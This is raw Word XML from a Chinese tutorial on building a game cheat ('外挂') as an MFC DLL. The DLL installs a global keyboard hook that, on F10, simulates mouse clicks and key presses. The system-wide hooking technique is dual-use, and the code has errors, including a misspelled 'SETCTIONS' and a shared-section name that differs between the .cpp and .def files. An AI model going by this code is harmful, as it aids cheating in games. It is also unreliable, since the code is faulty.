      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在其中输入如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#ifndef _KEYDLL_H</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#define _KEYDLL_H</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class AFX_EXT_CLASS CKeyHook:public CObject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CKeyHook();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~CKeyHook();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HHOOK Start();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装钩子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BOOL Stop(); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载钩子</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 xml:space="preserve">#endif </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.cpp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中加入声明＂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#include ActiveKey.h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>＂。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(4).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.cpp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中加入共享数据段，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//Shared data section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#pragma data_seg("sharedata")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HHOOK glhHook=NULL; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钩子句柄。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HINSTANCE glhInstance=NULL; //DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例句柄。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">#pragma data_seg() </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(5).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中设置共享数据段属性，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SETCTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shareddata READ WRITE SHARED </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(6).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveKey.cpp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中加入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CkeyHook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的实现代码和钩子函数代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键盘钩子处理函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>extern "C" LRESULT WINAPI KeyboardProc(int nCode,WPARAM wParam,LPARAM lParam)</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if( nCode &gt;= 0 )</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if( wParam == 0X79 )//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键时，激活外挂。</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外挂实现代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>CPoint newPoint,oldPoint;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GetCursorPos(&amp;oldPoint);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> newPoint.x = oldPoint.x+40;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> newPoint.y = oldPoint.y+10;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SetCursorPos(newPoint.x,newPoint.y);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟按下鼠标左键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟放开鼠标左键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keybd_event(VK_SHIFT,MapVirtualKey(VK_SHIFT,0),0,0); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SHIFT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keybd_event(0x52,MapVirtualKey(0x52,0),0,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keybd_event(0x52,MapVirtualKey(0x52,0),KEYEVENTF_KEYUP,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>keybd_event(VK_SHIFT,MapVirtualKey(VK_SHIFT,0),KEYEVENTF_KEYUP,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SHIFT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetCursorPos(oldPoint.x,oldPoint.y);</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return CallNextHookEx(glhHook,nCode,wParam,lParam);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CKeyHook::CKeyHook(){}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CKeyHook::~CKeyHook()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if( glhHook )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>Stop();</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安装全局钩子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HHOOK CKeyHook::Start()</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glhHook = SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,glhInstance,0);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置键盘钩子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>return glhHook;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载全局钩子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BOOL CKeyHook::Stop()</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BOOL bResult = TRUE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if( glhHook )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bResult = UnhookWindowsHookEx(glhHook);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载键盘钩子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>return bResult;</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(7).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DllMain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>extern "C" int APIENTRY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lpReserved</w:t>
      </w:r>
      <w:r>
